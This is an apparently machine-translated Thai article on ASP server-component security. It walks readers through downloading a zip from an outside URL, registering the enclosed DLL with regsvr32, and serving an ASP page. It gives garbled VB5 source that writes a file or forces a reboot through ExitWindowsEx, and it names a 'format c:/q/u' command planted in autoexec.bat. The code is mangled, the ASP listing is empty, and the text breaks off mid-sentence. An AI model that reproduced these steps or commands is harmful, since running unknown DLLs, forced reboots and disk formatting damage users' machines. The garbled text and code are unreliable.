ปัญหาด้านความปลอดภัยในไฟล์ ASP

ปัญหาด้านความปลอดภัยที่เป็นไปได้ใน ASP คืออะไร?

ASP มีฟังก์ชันที่มีประสิทธิภาพ เช่น ความเรียบง่าย การใช้งานง่าย มัลติฟังก์ชั่น และความสามารถในการปรับขยาย แต่ก็ยังมีปัญหาอยู่บ้างเช่นกัน ตัวอย่างเช่น หากคุณใช้ ASP ความปลอดภัยของเครือข่ายอาจลดลงอย่างมาก! นี่คือตัวอย่างสำหรับคุณ โปรดทำตามขั้นตอนด้านล่าง:

(1) ดาวน์โหลดไฟล์นี้จาก http://home.gbsource.net/xuankong/dll.zip ขยายขนาดและคัดลอกไฟล์ test.dll ไปที่ c:/windows/system (หากคุณใช้ NT โปรดคัดลอกไปที่ ไดเรกทอรีที่เกี่ยวข้อง);

(2) ถัดไปเปิดเมนู Start/Run และป้อนคำสั่ง regsvr32 test.dll

(3) คัดลอก index.asp ในแพ็คเกจไฟล์ที่คลายการบีบอัดไปยังไดเร็กทอรีเซิร์ฟเวอร์ของคุณ (หากคุณใช้การดีบัก PWS คุณสามารถคัดลอกไปที่ c:/inetpub/wwwroot, NT โปรดคัดลอกไปยังไดเร็กทอรีที่เกี่ยวข้อง);

(4) เปลี่ยนเครื่องและใช้ IE เพื่อเรียกดูไฟล์ index.asp และดู (สิ่งที่คุณเห็นคือรหัสข้อผิดพลาด แต่จริงๆ แล้วโปรแกรมกำลังทำงานอยู่แล้ว) จากนั้นกลับไปที่เครื่องของคุณแล้วดูที่ c :/ เพื่อดูว่าอยู่ข้างล่างนี้ มีไฟล์อีกไฟล์ไหม? ไฟล์ชื่อ xuankong.dat (อันที่จริง ถ้าฉันต้องการ ฉันสามารถเปิดหน้าไฟล์ c:/autoexec.bat ของคุณได้ และฉันสามารถเขียนคำสั่งบางอย่าง เช่น รูปแบบ c:/q/u เป็นต้น จากนั้นรอจนกว่าคุณจะ รีสตาร์ทครั้งต่อไป ผลลัพธ์จะชัดเจนในตัวเอง)

ปัญหาความปลอดภัยของเพจ ASP เกิดขึ้นได้อย่างไร?

มาดูกันว่าเกิดอะไรขึ้น ไฟล์ dll ที่คุณเพิ่งคัดลอกเป็นองค์ประกอบหลักที่ฉันพัฒนาโดยใช้ Visul Basic5

(1) เปิด VB5 เพื่อสร้างไฟล์ ActiveX.dll ใหม่และป้อนรหัสต่อไปนี้:

ฟังก์ชั่นการประกาศส่วนตัว ExitWindowsEx Lib user32_(ByVal uFlags As Long,ByVal dwReserved As Long)_As LongSub Xuankong ( ) โปรดอย่าเพิ่ม privatea$ = InputBox (กรุณากรอกชื่อของคุณ หากคุณป้อน xuankong+Chr(13)+Chr(10)+ ไฟล์ xuankong+Chr(10)+Chr(13)+ จะถูกสร้างขึ้นในระบบของคุณ มิฉะนั้นเครื่องของคุณอาจรีสตาร์ท , please enter,xuankong)ถ้า a$ = xuankong จากนั้นเปิด c:/xuankong.dat เพื่อผนวกเป็น #Write#1 เพื่อนของฉัน นี่คือโปรแกรมทดสอบส่วนประกอบหลักของ ASP #Write#1 สวัสดีชาวโลก! นี่คือการทดสอบ#เขียน#1 หากคุณเห็นไฟล์นี้ การทดสอบจะสำเร็จ! elseExitWindowsEx&H43,0ใช้ฟังก์ชัน API เพื่อรีสตาร์ทเครื่องสิ้นสุด ifClose #1End ย่อย

(2) เปลี่ยนชื่อโปรเจ็กต์เป็น dll และคลาสโมดูลที่จะทดสอบ จากนั้นสร้างไฟล์ dll จากโปรเจ็กต์นี้ไปยังไดเร็กทอรี c:/windows/system

(3) สร้างไฟล์ index.asp ใหม่และป้อนรหัสต่อไปนี้:

＜html>< ＜/html>

(4) คัดลอก index.asp ไปยังเซิร์ฟเวอร์ของคุณและแก้ไขข้อบกพร่องตามวิธีการข้างต้น!

สรุป:

สิ่งที่กล่าวมาข้างต้นคือปัญหาด้านความปลอดภัยของเมนแวร์ ASP! นอกจากนี้ หากผู้เขียนบางคนเขียนเนื้อหาหลักของ ASP อีกครั้ง